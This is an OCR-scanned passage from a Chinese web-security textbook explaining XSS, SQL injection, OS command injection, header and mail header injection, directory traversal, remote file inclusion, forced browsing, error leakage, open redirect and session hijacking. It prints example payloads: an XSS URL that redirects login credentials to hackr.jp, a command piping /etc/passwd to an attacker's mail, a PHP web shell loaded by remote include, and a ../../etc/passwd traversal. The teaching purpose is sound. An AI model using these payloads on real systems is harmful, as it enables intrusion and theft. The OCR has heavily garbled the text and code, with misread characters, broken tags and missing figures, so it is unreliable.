删除 线 显 示 出 来 并 不 会 造成 太 大 的 不 利 后 果 ， 但 如 果 换 成 使 用 
script 标签 将 会 如 何 呢 。 


XSS 是 攻击 者 利用 预先 设置 的 陷阱 触发 的 被 动 攻击 

路 站 脚本 攻击 属于 被 动 攻击 模式 ， 因 此 攻击 者 会 事先 布置 好 用 于 攻 
击 的 陷阱 。 

下 图 网 站 通过 地 址 栏 中 URI 的 查询 字段 指定 DD， 即 相当 于 在 表单 
内 自动 填写 字符 串 的 功能 。 而 就 在 这 个 地 方 ， 隐 藏 看 可 执行 跨 站 脚本 攻 
击 的 漏洞。 


http://example.jp/login?ID=yama 






充分 熟知 此 处 漏洞 特点 的 攻击 者 ， 于 是 就 创建 了 下 面 这 段 柑 入 恶意 
代码 的 URL。 并 隐藏 植 入 事先 准备 好 的 欺诈 邮件 中 或 Web 页 面 内 ， 诱 
使 用 户 去 点 击 该 URL。 


http://example.jp/login?ID="><script>var+f=document 坟 
getElementById("login") ;+f.action="http://hackr .jp/Pwget"i+f.method= 一 
"get";</acript><span+s=" z z 


浏览 器 打开 该 URI 后 ， 直 观感 觉 没 有 发 生 任 何 变 化 ， 但 设置 好 的 
脚本 却 偷偷 开始 运行 了 。 当 用 户 在 表单 内 输入 ID 和 密码 之 后 ， 就 会 直 








表面 上 及 有 变化 但 脚 上 人、 Es or 





表单 填写 完毕 后 就 直 
接 把 ID 及 密码 发 送 到 
攻击 者 的 网 站 





，ID 及 密码 会 传 给 该 正规 网 站 ， 而 接 下 来 仍然 是 按 正常 登录 
ee ee 只 到 目 己 的 登录 信息 已 遭 泄 露 。 


对 http://example.jp/login?ID=yama 请 求 时 对 应 的 HTML 源 代 码 | 摘录 ) 


<div ClLasSs=nlogon> 
<img src="/img/10go. Sb alt="E! 拍卖 会 
‘</div> 
<form action="http://example. jp/1ogin" method="post" id="login"> 
<div class="input id"> 
ID <input type="text" name="ID" ei /> 
</div> 


http://example.jp/login?ID="><script>var+f=document .getElementById 
("login");+f.action="http://hackr.jp/pwget";+f .method="get";</script> 
<span+9=" 对 请 求 时 对 应 的 HTML 源 代码 ( 摘录 ) 


<div class="logo"> 

<img src="/img/logo.gif" alt="E! 拍卖 会 /> 
</div> 
<form action="http://example.jp/login" method="post" id="login"> 
<div class="input id"> 

ID <input type="text" name="ID" value=""><sScript>var f=document = 
.getElementById("login"); f.action="http://hackr.jp/pwget"; 上 .method= 二 
get";</script><span s="" /> 
</div> 
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图 对 用 户 Cookie 的 窃取 攻击 
除了 在 表单 中 设 下 圈套 之 外 ， 下 面 那 种 恶意 构造 的 脚本 同样 能 够 以 
跨 站 脚本 攻击 的 方式 ， 窃 取 到 用 户 的 Cookie 信息 。 






该 脚本 内 指定 的 http://hackrjp/xss.js 文件 。 即 下 面 这 段 采 用 
JavaScript 编写 的 代码 。 





在 存在 可 器 站 脚本 攻击 安全 漏洞 的 Web 应 用 上 执行 上 面 这 上 段 
JavaScript 程序 ， 即 可 访问 到 该 Web 应 用 所 处 域名 下 的 Cookie 信息 。 然 
后 这 些 信 息 会 发 送 至 攻击 者 的 Web 网 站 ( http:/hackrjp/ )， 记 录 在 他 的 
登录 日 志 中 。 结 果 ， 攻 击 者 就 这 样 窃取 到 用 户 的 Cookie 信息 了 。 





图 : 使 用 XSS 攻击 夺取 Cookie 信息 








11.2.2 SQL 注入 攻击 


国会 执行 非法 SQL 的 SQL 注入 攻击 

SQL 注入 ( SQL Injection ) 是 指针 对 Web 应 用 使 用 的 数据 库 ， 通 过 
运行 非法 的 SQL 而 产生 的 攻击 。 该 安全 隐患 有 可 能 引发 极 大 的 威胁 ， 
有 时 会 直接 导致 个 人 信息 及 机 密 信 息 的 泄露 。 

Web 应 用 通常 都 会 用 到 数据 库 ， 当 需要 对 数据 库 表 内 的 数据 进行 检 
索 或 添加 、 删 除 等 操作 时 ， 会 使 用 SQL 语句 连接 数据 库 进行 特定 的 操 
作 。 如 有 果 在 调用 SQL 语句 的 方式 上 存在 疏漏 ， 就 有 可 能 执行 被 恶意 注 
人 人 (Injection ) 非法 SQL 语句 。 

SQL 注入 攻击 有 可 能 会 造成 以 下 等 影响 。 


9 非法 查看 或 算 改 数据 库 内 的 数据 

e 规避 认证 

e 执行 和 数据 库 服务 器 业务 关联 的 程序 等 
何 为 SQL 

SQL 是 用 来 操作 关系 型 数据 库 管 理 系统 (Relational DataBase 
Management System，RDBMS ) 的 数据 库 语 言 ， 可 进行 操作 数据 或 定义 
数据 等 。RDBMS 中 有 名 的 数据 库 有 Oracle Database、Microsoft SQL 
Server、IBM DB2、MySQL 和 PostgreSQL 等 。 这 些 数据 库 系 统 都 可 以 
把 SQL 作为 数据 库 语言 使 用 。 

使 用 数据 库 的 Web 应 用 ， 通 过 某 种 方法 将 SQL 语句 传 给 RDBMS， 
再 把 RDBMS 返回 的 结果 灵活 地 使 用 在 Web 应 用 中 。 
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于 SQL 注 入 攻击 肥 例 

下 面 以 某 个 购物 网 站 的 搜索 功能 为 例 ， 讲 解 SQL 注入 攻击 。 通 过 
该 功能 ， 我 们 可 以 将 杀 作 者 的 名 字 作 为 搜索 关键 字 ， 查 找 该 作者 的 所 有 
者 作 。 








图 : SQL 注入 攻击 案例 


正常 处 理 的 操作 示例 
下 图 是 将 “上 夺 宣 ”作为 关键 字 的 搜索 纺 采 。 





从 bookTbl 表 中 ， 显 示 满 足 author= 上 野 宣 and flag=1( 可 售 ) 所 在 行 的 数据 


: 正常 处 理 操作 的 示例 


URL 的 查询 字段 已 指定 q9= 上 野 宣 ,这 个 值 由 Web 应 用 传人 到 
SQL 语句 中 ， 构 成 下 方 的 SQL 语句 。 





PROM bookThl WHERE author - ,上 野 宣 ， and flag = 1; 
该 SQL 语句 表示 “从 bookTbl 表 中 ， 显 示 满 足 author= 上 野 宣 
flag=1 ( 可 售 ) 所 在 行 的 数据 ”。 
数据 库 内 的 bookTbl 表 记 录 着 该 购物 网 站 的 所 有 书籍 信息 。 通 过 
SQL 语句 ， 将 满足 作者 名 ( author ) 上 野 宣 并 且 flag 为 1 双重 条 件 的 条 
目 取 出 ， 最 后 作为 搜索 结果 显示 出 来 。 


bookTb| 





0 a 人 的 | 
放 二 | 划 | | 
我 们 一 起 ee 作协 以 这 下 Re 本 





从 bookTbl 表 内 显示 满足 "author= 上层 宣 " 且 “flag=1" 条件 的 所 在 行 数据 | 
”flag-=0" 代表 绝版 的 书 条 


图 : 数据 库 处 理 


SQL 注入 攻击 的 操作 示例 
把 刚才 指定 查询 字段 的 上 野 宣 改写 成 “上 野 宣 --”。 
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rs 站 \ 
[ 作 才 ”上 时 富 “的 搜索 结 染 | http//example.com/search?q= 上 时 宣 一 


吕 妈 - : 
SELECT FROM bookThl WHERE author= 上 上 时 宣 ,- -and 和 lag =1; 


| 从 bookTbl 表 内 显示 满足 *author= 上野 宣 " 这 个 条 件 的 所 在 行 数据 
( -之 后 的 内 容 会 自动 判 为 注释 ， 因 此 flag=1 这 个 条 件 就 被 直接 忽略 了 ) 





图 : SQL 注入 攻击 的 操作 示例 


构成 的 SQL 语句 就 变 成 “从 数据 库 的 bookTbl 表 中 ,显示 满足 
author= 上 野 宣 条 件 所 在 行 的 数据 *"， 如 下 所 示 。 


SELECT * FROM bookTb] WHERE author -上 + and flag=1; 





SQL 语句 中 的 -- 之 后 全 视 为 注释 。 即 ，and flag=1 这 个 条 件 被 自动 
忽略 了 。 





从 bookTbl 表 内 显示 满足 "author= 上 野 宇 这 个 条 件 的 所 在 行 数据 
( flag 这 个 筛选 条 件 因 SQL 注入 变 成 无 效 的 了 ) 





图 : 数据 库 处 理 


结果 跟 flag 的 设 定 值 无 关 ， 只 取出 满足 author= “上野 宣 ”条 件 所 在 
行 的 数据 ， 这 样 连 那些 尚未 出 版 的 书籍 也 一 并 显示 出 来 了 。 








国 SQL 注入 攻击 破坏 SQL 语句 结构 的 案例 
SQL 注入 是 攻击 者 将 SQL 语句 改变 成 开发 者 音 想 不 到 的 形式 以 达 
到 破坏 结构 的 攻击 。 
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比如 ， 在 之 前 的 攻击 案例 中 ， 就 会 把 author 的 字面 值 (程序 中 使 用 
的 常量 ) " 上 野 宣 '--" 的 字符 串 赋值 给 $q。 


SELECT * FROM bookTbl WHERE author = '$q' and flag = 1; 





SELECT * FROM bookTb] WHERE author =| - and flag = 1; 


| author 的 字面 值 溢出 
图 : SQL 注入 攻击 的 原理 


上 图 中 颜色 标记 的 字符 串 最 开始 的 单 引 号 () 表示 会 将 author 的 字 
面值 括 起 来 ， 以 到 达 第 二 个 单 引 号 后 作为 结束 。 因 此 ，author 的 字面 值 
吕 成 了 上 野 宣 ， 而 后 面 的 -- 则 不 再 属于 author 字 面值 ， 会 被 解析 成 其 
他 的 句法 。 

本 案例 中 的 问题 仅仅 是 把 未 出 版 书籍 的 条 目 也 一 同 显示 出 来 了 。 但 
实际 发 生 SQL 注 人 攻击 时 ， 很 有 可 能 会 导致 用 户 信息 或 结算 内 容 等 其 
他 数据 表 的 非法 浏览 及 复 改 ， 从 而 使 用 户 遭 受 不 同 程度 的 损失 。 


11.2.3 ”OS 命令 注入 攻击 

OS 命令 注入 攻击 (OS Command Injection ) 是 指 通过 Web 应 用 ， 
执行 非法 的 操作 系统 命令 达到 攻击 的 目的 。 只 要 在 能 调用 Shell 函数 的 
地 方 就 有 存在 被 攻击 的 风险 。 

可 以 从 Web 应 用 中 通过 Shell 来 调用 操作 系统 命令 。 倘 若 调用 Shell 
时 存在 朴 漏 ， 就 可 以 执行 插入 的 非法 OS 命令 。 

0OS 命令 注 人 攻击 可 以 向 Shell 发 送 命令 ， 让 Windows 或 Linux 操 
作 系 统 的 命令 行 启 动 程序 。 也 就 是 说 ， 通 过 OS 注入 攻击 可 执行 OS 上 
安 疹 着 的 各 种 程序 。 











图 OS 注入 攻击 案例 


下 面 以 咨询 表单 的 发 送 功能 为 例 ， 讲 解 OS 注入 攻击 。 该 功能 可 将 
用 户 的 咨询 邮件 按 已 填写 的 对 方 邮箱 地 址 发 送 过 去 。 





图 : OS 注入 攻击 的 攻击 案例 
下 面 摘 选 处 理 该 表单 内 容 的 一 部 分 核心 代码 。 


本 -AP i 


a TS 

Cs = Sg Rr ER [ saseoroe A 

EE OO PSO -UL TREE 一- 
Te 

a os A Oe er 

一 -IE 


SE A 
i a We, 
-em 
2 TY 
了 二 ae SMILE EEC 二 :i rd cn 
se as | Ce .A a Te ee 
Esc 二 二 Me a Le a Wa cas 


程序 中 的 open 函数 会 调用 sendmail 命令 发 送 邮 件 ， 而 指定 的 邮件 
发 送 地 址 即 Sadr 的 值 。 


攻击 者 将 下 面 的 值 指定 作为 邮件 地 址 。 





程序 接收 该 值 ， 构 成 以 下 的 命令 组 合 。 
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攻击 者 的 输入 值 中 含有 分 号 ( ; )。 这 个 符号 在 OS 命令 中 ， 会 被 解 
析 为 分 隅 多 个 执行 命令 的 标记 。 

可 见 ，sendmail 命令 执行 被 分 隔 后 ， 接 下 去 就 会 执行 cat /etc/passwd 
| mail hack@example.jp 这 样 的 命令 了 。 结 果 ， 含 有 Linux 账户 信息 /etc/ 
passwd 的 文件 ， 就 以 邮件 形式 发 送 给 了 hack@example.jp。 


11.2.4 ”HTTP 首部 注入 攻击 

HTTP 首部 注入 攻击 ( HTTP Header Injection ) 是 指 攻击 者 通过 在 
响应 首部 字段 内 插入 换行 ， 添 加 任意 响应 首部 或 主体 的 一 种 攻击 。 属 于 
被 动 攻 击 模式 。 

向 首部 主体 内 添加 内 容 的 攻击 称 为 HTTP 响应 截断 攻击 ( HTTP 
Response Splitting Attack )。 

如 下 所 示 ，Web 应 用 有 时 会 把 从 外 部 接收 到 的 数值 ， 赋 给 响应 首部 
字段 Location 和 Set-Cookie。 





HTTP 首部 注入 可 能 像 这 样 ， 通 过 在 某 些 响应 首部 字段 需要 处 理 输 
出 值 的 地 方 ， 插 入 换行 发 动 攻击 。 
HTTP 首部 注入 攻击 有 可 能 会 造成 以 下 一 些 影响 。 


9 设置 任何 Cookie 信息 
9 重 定向 至 任意 URL 
9 显示 任意 的 主体 ( HTTP 响应 截断 攻击 ) 











国 HTTP 首 部 注入 攻击 案例 


下 面 我 们 以 选 定 某 个 类 别 后 即 可 跳 转 至 各 类 别 对 应 页 面 的 功能 为 
例 ， 讲 解 HTTP 首部 注入 攻击 。 该 功能 为 每 个 类 别 都 设 定 了 一 个 类 别 
ID 值 ， 一 旦 选 定 某 类 别 ， 就 会 将 该 DD 值 反映 在 啊 应 内 的 Location 首部 
字段 内 ， 形 如 Location: http://example.com/?cat=101。 令 浏览 器 发 生 重 定 
向 跳 转 。 


重 定向 至 选 定 类 别 所 在 页 面 的 功能 






请 从 下 方 选 择 类 别 。 


| | 所 有 的 类 别 


( 101 ) 
(102 ) 
L083) | 


ei http://example. cur/ Tout=101 01 


图 : HTTP 首部 注入 攻击 示例 


攻击 者 以 下 面 的 内 容 替 代 之 前 的 类 别 ID 后 发 送 请 求 。 


ry 
a MM i 
和 





其 中 ，%0D%0A 代表 HTTP 报 文中 的 换行 符 ， 紧 接着 的 是 可 强制 
将 攻击 者 网 站 (http:/hackrjp/ ) 的 会 话 卫 设置 成 SID=123456789 的 
Set-Cookie 首部 字段 。 

发 送 该 请 求 之 后 ， 假 设 结果 返回 以 下 响应 。 
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此 刻 ， 首 部 字段 Set-Cookie 已 生效 ， 因 此 攻击 者 可 指定 修改 任意 的 
Cookie 信息 。 通 过 和 会 话 固定 攻击 (攻击 者 可 使 用 指定 的 会 话 ID ) 攻 
击 组 合 ， 攻 击 者 可 伪装 成 用 户 。 

攻击 者 输入 的 %0D%0A， 原 本 应 该 属于 首部 字段 Location 的 查询 
值 部 分 ， 但 经 过 解析 后 ，%0D%0A 变 成 了 换行 符 ， 结 果 插 入 了 新 的 首 
部 字段 。 

这 样 一 来 ， 攻 击 者 可 在 响应 中 插入 任意 的 首部 字段 。 


图 HTTP 响应 截断 攻击 

HTTP 响应 截断 攻击 是 用 在 HTTP 首部 注入 的 一 种 攻击 。 攻 击 顺 序 
相同 , 但 是 要 将 两 个 %0D%0A%0D%0A 并 排 插 人 字符 串 后 发 送 。 利 用 
这 两 个 连续 的 换行 就 可 作出 HTTP 首部 与 主体 分 隔 所 需 的 空 行 了 ， 这 样 
就 能 显示 伪造 的 主体 ， 达 到 攻击 目的 。 这 样 的 攻击 叫做 HTTP 响应 截断 
攻击 。 


一 






在 可 能 进行 HTTP 首部 注入 的 环节 ， 通 过 发 送 上 面 的 字符 串 ， 返 回 
结果 得 到 以 下 这 种 响应 。 











利用 这 个 攻击 ,已 触发 陷阱 的 用 户 浏览 器 会 显示 伪造 的 Web 页 面 ， 
再 让 用 户 输入 自己 的 个 人 信息 等 ， 可 达到 和 跨 站 脚本 攻击 相同 的 效果 。 

另外 ， 滥 用 HTTP/1.1 中 汇集 多 响应 返回 功能 ， 会 导致 缓存 服务 符 
对 任意 内 容 进 行 缓存 操作 。 这 种 攻击 称 为 缓存 污染 。 使 用 该 缓存 服务 
器 的 用 户 ， 在 浏览 遭受 攻击 的 网 站 时 ， 会 不 断 地 浏览 被 替换 掉 的 Web 
网 页 。 


11.2.5 ”邮件 首部 注入 攻击 

邮件 首部 注入 Mail Header Injection ) 是 指 Web 应 用 中 的 邮件 发 送 
功能 ， 攻 击 者 通过 向 邮件 首部 To 或 Subject 内 任意 添加 非法 内 容 发 起 的 
攻击 。 利 用 存在 安全 漏洞 的 Web 网 站 ， 可 对 任意 邮件 地 址 发 送 广告 邮 
件 或 病毒 邮件 。 


图 邮件 首部 注入 攻击 案例 

下 面 以 Web 页 面 中 的 咨询 表单 为 例 讲解 邮件 首部 注入 攻击 。 该 功 
能 可 在 表单 内 填 人 咨询 者 的 邮件 地 址 及 咨询 内 容 后 ， 以 邮件 的 形式 发 送 
给 网 站 管理 员 。 









加 咨询 
请 填写 以 下 表单 后 发 送 。 


tp 件 地 址 [| 


| | | 


| 
玫 
- 
a le = a sie Pe ae wT 


图 : 邮件 首部 注入 攻击 案例 





攻击 者 将 以 下 数据 作为 邮件 地 址 发 起 请 求 。 
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bobe@hackr . jp%0D%0ABce: user@exampl ecom 人 


%0D%0A 在 邮件 报 文中 代表 换行 符 。 一 旦 咨询 表单 所 在 的 Web 应 
用 接收 了 这 个 换行 符 ， 就 可 能 实现 对 Bee 邮件 地 址 的 追加 发 送 ， 而 这 原 
本 是 无 法 指定 的 。 

另外 像 下 面 一 样 ， 使 用 两 个 连续 的 换行 符 就 有 可 能 自 改 邮件 文本 内 
容 并 发 送 。 


bob@hackr. jps0D%0aA%0DS%0RATest Message 


再 以 相同 的 方法 ， 就 有 可 能 改写 To 和 Subject 等 任意 邮件 首部 ,或 
回 文 本 添加 附件 等 动作 。 


11.2.6 目录 遍历 攻击 

目录 遍历 ( Directory Traversal ) 攻击 是 指 对 本 无 意 公 开 的 文件 目 
录 ， 通 过 非法 截断 其 目录 路 径 后 ， 达 成 访问 目的 的 一 种 攻击 。 这 种 攻击 
有 时 也 称 为 路 径 遍 历 ( Path Traversal ) 攻击 。 

通过 Web 应 用 对 文件 处 理 操作 时 ， 在 由 外 部 指定 文件 名 的 处 理 存 
在 朴 漏 的 情况 下 ， 用 户 可 使 用 .../ 等 相对 路 径 定位 到 /etc/passed 等 绝对 
路 径 上 ， 因 此 服务 器 上 任意 的 文件 或 文件 目录 和 崖 有 可 能 被 访问 到 。 这 样 
一 来 ， 就 有 可 能 非法 浏览 、 臭 改 或 删除 Web 服务 大 上 的 文件 。 

固然 存在 输出 值 转 义 的 问题 ， 但 更 应 该 关闭 指定 对 任意 文件 名 的 访 
回 权 限 。 


国 目 录 授 历 攻击 案例 
下 面 以 显示 读 取 文 件 功 能 为 例 ， 讲 解 目录 遍历 攻击 。 该 功能 通过 以 
下 查询 字段 ， 指 定 某 个 文件 名 。 然 后 从 /wwwlog/ 文件 目录 下 读 取 这 个 





指定 的 文件 。 
http://example.com/read.php?1og=0401.1og 


攻击 少 设 置 如 下 查询 字段 后 发 出 请 求 。 


http://example.com/read.php?log=../../etc/pasaswd 


查询 字段 为 了 读 取 攻击 者 盯 上 的 /etc/passwd 文件 ， 会 从 /www/log/ 
目录 开始 定位 相对 路 径 。 如 果 这 份 read.php 脚本 接受 对 指定 目录 的 访问 
请 求 处 理 ， 那 原本 不 公开 的 文件 就 存在 可 被 访问 的 风险 。 


log=../../etc/passwd 





Ilog=0401 .| 
SS 





图 : 目录 遍历 攻击 案例 


11.2.7 ”远程 文件 包含 滑 油 

远程 文件 包含 漏洞 (Remote File Inclusion ) 是 指 当 部 分 脚本 内 容 需 
要 从 其 他 文件 读 和 时， 攻击 者 利用 指定 外 部 服务 器 的 URL 充当 依赖 文 
件 ， 让 脚本 读 取 之 后 ， 就 可 运行 任意 脚本 的 一 种 攻击 。 

这 主要 是 PHP 存在 的 安全 漏洞 ， 对 PHP 的 include 或 require 来 说 ， 


ee ee 三 Eee 
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二 一 一 一 一 一 一 一 一 三 


这 和 是 一 种 可 通过 设 定 ， 指 定 外 部 服务 器 的 URL 作为 文件 名 的 功能 。 但 
是 ， 该 功能 太 危险 ，PHP5.2.0 之 后 默认 设 定 此 功能 无 效 。 
固然 存在 输出 值 转 义 的 问题 ， 但 更 应 控制 对 任意 文件 名 的 指定 。 


国 远 程 文件 包含 漏洞 的 攻击 案例 

下 面 以 include 读 和 由 查询 字段 指定 文件 的 功能 为 例 ， 讲 解 远程 文 
件 包含 汤 洞 。 该 功能 可 通过 以 下 查询 字段 形式 指定 文件 名 ， 并 在 脚本 内 
的 include 语句 处 读 入 这 个 指定 文件 。 


http://example.com/foo.php?mod=news .Php 


对 应 脚本 的 源 代码 如 下 所 示 。 
http://example.com/foo.php 的 源 代 码 ( 部 分 摘录 ) 
$modname = $ GET['mod']; 
include ($modname); 
攻击 者 指定 如 同 下 面 形式 的 URL 发 出 请 求 。 
httpz://example.com/fco.php?mod=http://hackr .jp/cmda.phpa&cmd=s1le 


攻击 者 已 事先 在 外 部 服务 器 上 准备 了 以 下 这 段 脚本 。 


http://hackr.jp/cmd.php 的 源 代 码 


<? system($ GET['cmd']) ?> 


假设 Web 服务 占 (example.com ) 的 include 可 以 引入 外 部 服务 器 的 





Pa 





URL， 那 就 会 读 入 攻击 者 在 外 部 服务 右上 事先 准备 的 URL ( http://hackr. 
jp/cmd.php )。 结 果 ， 通 过 system 咀 数 就 能 在 Web 服务 做 (example. 
com ) 上 执行 查询 字段 指定 的 OS 命令 


http://example.com/foo.php?+mod=news.php 
读 入 同一 目录 下 的 文件 并 执行 





攻击 实例 
http://example.com/foo.php?mod=hitp://hackr.jp/cmd.php&cmd=|s 
读 入 外 部 服务 器 上 的 脚本 并 执行 


[ http:Whackr.jp/cmd.php 的 源 代码 】 
<? system($ GETI['cmd')) ?> 
通过 system 了 缚 数 就 能 够 在 example.com 服务器 上 执行 OS 人 节令 
图 : 远程 文件 包含 漏洞 的 攻击 案例 
在 以 上 攻击 案例 中 ,执行 了 可 显示 Web 服务 器 ( example.com ) 上 
文件 及 目录 信息 的 ls 命令 。 


11.3” 因 设置 或 设计 上 的 缺陷 引发 的 安全 漏洞 
因 设 置 或 设计 上 的 缺陷 引发 的 安全 漏洞 是 指 ， 错 误 设 置 Web 服务 
角 ， 或 是 由 设计 上 的 一 些 问题 引起 的 安全 漏洞 。 
11.3.1 强制 浏览 
强制 浏览 ( Forced Browsing ) 安全 漏洞 是 指 ， 从 安置 在 Web 服务 
需 的 公开 目录 下 的 文件 中 ， 训 览 那些 原本 非 自 愿 公开 的 文件 。 
强制 浏览 有 可 能 会 造成 以 下 一 些 影 响 。 





9 泄露 顾客 的 个 人 信息 等 重 要 情报 
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e 泄露 原本 需要 具有 访问 权限 的 用 户 才 可 查阅 的 信息 内 容 
e 泄露 未 外 连 到 外 界 的 文件 


对 那些 原本 不 愿 公 开 的 文件 ， 为 了 保证 安全 会 隐蔽 其 URL。 可 一 
日 知道 了 那些 URL， 也 就 意味 着 可 浏览 URL 对 应 的 文件 。 直 接 显示 容 
易 推测 的 文件 名 或 文件 目录 索引 时 ， 通 过 某 些 方法 可 能 会 使 URL 产生 


文件 目录 一 览 
http://www.example.com/log/ 
通过 指定 文件 目录 名 称 ， 即 可 在 文件 一 览 中 看 到 显示 的 文件 名 。 


容易 被 推测 的 文件 名 及 目录 名 
http://www.example.com/entry/entry 081202.log 
文件 名 称 容易 推测 ( 按 上 面 的 情况 ， 可 推出 下 一 个 文件 是 
entry 081203.log ) 


备份 文件 
http://www.example.com/cgi-bin/entry.cgi( 原始 文件 ) 
http://www.example.com/cgi-bin/entry.cgi~( 备份 文件 ) 
http://www.example.com/cgi-bin/entry.bak ( 备份 文件 ) 
由 编辑 软件 自动 生成 的 备份 文件 无 执行 权限 ， 有 可 能 直接 以 源 代码 
形式 显示 


经 认证 才 可 显示 的 文件 
直接 通过 URL 访问 原本 必须 经 过 认证 才能 在 Web 页 面 上 使 用 的 文 
件 (HTML 文件、 图片、PDEF 等 文档 、CSS 以 及 其 他 数据 等 ) 





国 强 制 浏览 导致 安全 漏洞 的 案例 
下 面 我 们 以 会 员 制 度 的 SNS 日 记功 能 为 例 ， 讲 解 强制 浏览 可 能 导 


i 





致 的 安全 漏洞 。 该 日 记功 能 保证 了 除 具 有 访问 权限 的 用 户 本 人 以 外 ， 其 
他 人 者 不 能 访问 日 记 。 







只 有 山田 本 人 以 及 和 他 加 为 好 友 
”的 用 户 才能 访问 山田 的 日 记 

| [山田 先生 的 日 记 一 览 。 / 

时 今天 的 BBO 深 : 公 









| [证 Se 
| 时” 直接 指定 图 片 URL, 即使 没有 访 
的 有 心 司 的 川 | 

| , 人 问 权限 的 用 户 也 可 能 看 到 






图 : 强制 浏览 导致 安全 漏洞 的 案例 


该 日 记 中 包含 的 图 像 照片 的 源 代 码 如 下 所 示 。 


即使 没有 对 这 篇 日 记 的 访问 权限 ， 只 要 知道 这 图 片 的 URL， 通 过 


直接 指定 URL 的 方式 就 能 显示 该 图 片 。 日 记 的 功能 和 文本 具有 访问 对 
象 的 控制 ， 但 不 具备 对 图 片 访问 对 象 的 控制 ， 从 而 产生 了 安全 漏洞 。 


11.3.2 不 正确 的 错误 消息 处 理 


不 正确 的 错误 消息 处 理 ( Error Handling Vulnerability ) 的 安全 漏洞 


是 指 ，Web 应 用 的 错误 信息 内 包含 对 攻击 者 有 用 的 信息 。 与 Web 应 用 
有 关 的 主要 铺 误 信息 如 下 所 示 。 


@ Web 应 用 抛 出 的 错误 消息 
9 数据 库 等 系统 抛 出 的 错误 消息 
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Web 应 用 不 必 在 用 户 的 浏览 画面 上 展现 详细 的 错误 消息 。 对 攻击 者 
来 说 ， 许 细 的 错误 消息 有 可 能 给 他 们 下 一 次 攻击 以 提示 。 


图 不 正确 的 稍 误 消 息 处 理 导致 安全 漏洞 的 案例 


Web 应 用 抛 出 的 错误 消息 

下 面 以 认证 功能 的 认证 错误 消息 为 例 ， 讲 解 不 正确 的 错误 消息 处 理 
方式 。 该 认证 功能 ， 在 输 人 表单 内 的 邮件 地 址 及 密码 匹配 发 生 错误 时 ， 
会 提示 错误 信息 。 





= 2 
ee 


这 里 给 出 的 提示 “ 邮件 地 址 未 注册 "是 想 传 达 已 注册 
的 邮件 地 址 输入 错误 的 消息 。 但 由 于 提示 信息 的 差 
异 , 同样 也 可 能 被 攻击 者 用 于 确认 账号 是 否 存 在 。 


图 : 不 正确 的 错误 消息 处 理 导致 安全 漏洞 的 案例 


上 方 画 面 提示 “邮件 地 址 未 注册 ”的 错误 消息 。 当 输入 的 邮件 地 址 
尚未 在 该 Web 网 站 上 注册 时 ， 就 会 触发 这 条 错误 消息 。 因 为 倘 耕 邮件 
地 址 存在 ， 应 该 会 提示 “输入 的 密码 有 误 ” 之 类 的 错误 消息 。 

攻击 者 利用 进行 不 同 的 输入 会 提示 不 同 的 错误 信息 这 条 ， 就 可 用 来 
确认 输入 的 邮件 地 址 是 否 已 在 这 个 Web 网 站 上 注册 过 了 。 

为 了 不 让 错误 消息 给 攻击 者 以 启发 ， 建 议 将 提示 消息 的 内 容 仅 保留 
到 “认证 错误 ”这 种 程度 即 可 。 





相 | : 


数据 库 等 系统 抛 出 的 错误 消息 

下 面 我 们 以 搜索 功能 提示 的 错误 信息 为 例 ， 讲 解 不 正确 的 稍 旋 消息 
处 理 。 本 功能 用 于 检索 数据 ， 当 输入 未 预料 的 字符 串 时 ， 会 提示 数据 库 
的 错误 。 

下 面 以 认证 功能 的 认证 错误 消息 为 例 ， 讲 解 不 正确 的 错误 消息 处 
理 。 该 认证 功能 在 输入 表单 内 的 邮件 地 址 及 密码 匹配 发 生 错误 时 ， 会 提 
示 错 误 信 息 。 


i DBD::mysal::st execute failed: You have an 


| error in your SOL syntax; check the manual 

4 that corresponds to your MySOQL server | 
version for the right syntax to Use near ”|N 中 
i Itemnum,name,scnmj at line 1 at 下 

/Var/www/search.cgi line 107. 





可 知 使 用 的 是 | MySQL ) 数 据 库 。 
还 能 看 到 部 分 SQL 语句 片段 。 


: 不 正确 的 错误 消息 处 理 导致 安全 漏洞 的 案例 


上 方 的 画面 中 显示 了 与 SQL 有 关 的 错误 信息 。 对 开发 者 而 言 ， 该 
信息 或 许 在 Debug 时 会 有 帮助 ， 但 对 用 户 毫 无 用 处 。 

攻击 者 从 这 条 消息 中 可 读 出 数据 库 选 用 的 是 MySQL， 甚 至 还 看 见 
了 SQL 语句 的 片段 。 这 可 能 给 攻击 者 进行 SQL 注入 攻击 以 局 发 。 

系统 抛 出 的 错误 主要 集中 在 以 下 几 个 方面 。 


9 PHP 或 ASP 等 脚本 错误 
9 数据 库 或 中 间 件 的 错误 
@ Web 服务 器 的 错误 


各 系统 应 对 详细 的 错误 消息 进行 抑制 设 定 ， 或 使 用 目 定 义 错误 请 
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息 ， 以 避免 某 些 错误 信息 给 攻击 者 以 局 发。 


11.3.3 ”开放 重 定向 

开放 重 定 癌 ( Open Redirect ) 是 一 种 对 指定 的 任意 URL 作 重 定 加 
跳 转 的 功能 。 而 于 此 功能 相关 联 的 安全 漏洞 是 指 ， 假 如 指定 的 重 定向 
URL 到 某 个 具有 恶意 的 Web 网 站 ,那么 用 户 就 会 被 请 守 至 那个 Web 
网 站 。 


图 开放 重 定 问 的 攻击 案例 
我 们 以 下 面 的 URL 做 重 定向 为 例 ， 讲 解 开放 重 定向 攻击 案例 。 该 
功能 就 是 四 URL 指定 参数 后 ， 使 本 来 的 URL 发 生 重 定 同 跳 转 。 






攻击 者 把 重 定 癌 指 定 的 参数 改写 成 已 设 好 陷阱 的 Web 网 站 对 应 的 
连接 ， 如 下 所 示 。 





用 户 看 到 URL 后 原 以 为 访问 example.com， 不 料 实际 上 被 诱导 至 
hackr.jp 这 个 指定 的 重 定向 目标 。 

可 信 度 高 的 Web 网 站 如 果 开 放 重 定 辣 功能 ， 则 很 有 可 能 被 攻击 者 
选中 并 用 来 作为 钓鱼 攻击 的 跳板 。 


11.4 ” 因 会 话 管理 朴 忽 引发 的 安全 漏洞 


会 话 管理 是 用 来 管理 用 户 状态 的 必 备 功能 ， 但 是 如 果 在 会 话 管 理 上 
有 所 朴 忽 ， 就 会 导致 用 户 的 认证 状态 被 窃取 等 后 果 。 














11.4.1 会 话 劫持 
会 话 劫持 ( Session Hijack ) 是 指 攻击 者 通过 某 种 手段 拿 到 了 用 户 的 
会 话 ID， 并 非法 使 用 此 会 话 ID 伪装 成 用 户 ， 达 到 攻击 的 目的 。 


登录 中 ( 认证 状态 ) 的 会 话 ID 
http://example.com/login?sid=bb3cB8a93a024e 





攻击 者 通过 某 种 手段 得 到 了 会 话 1D 
( bb3c8a93a024e | 


http:/example.corm/loginyslid=bb3c8a93a0246 






伪装 成 用 户 A 
”欢迎 山口 先生 
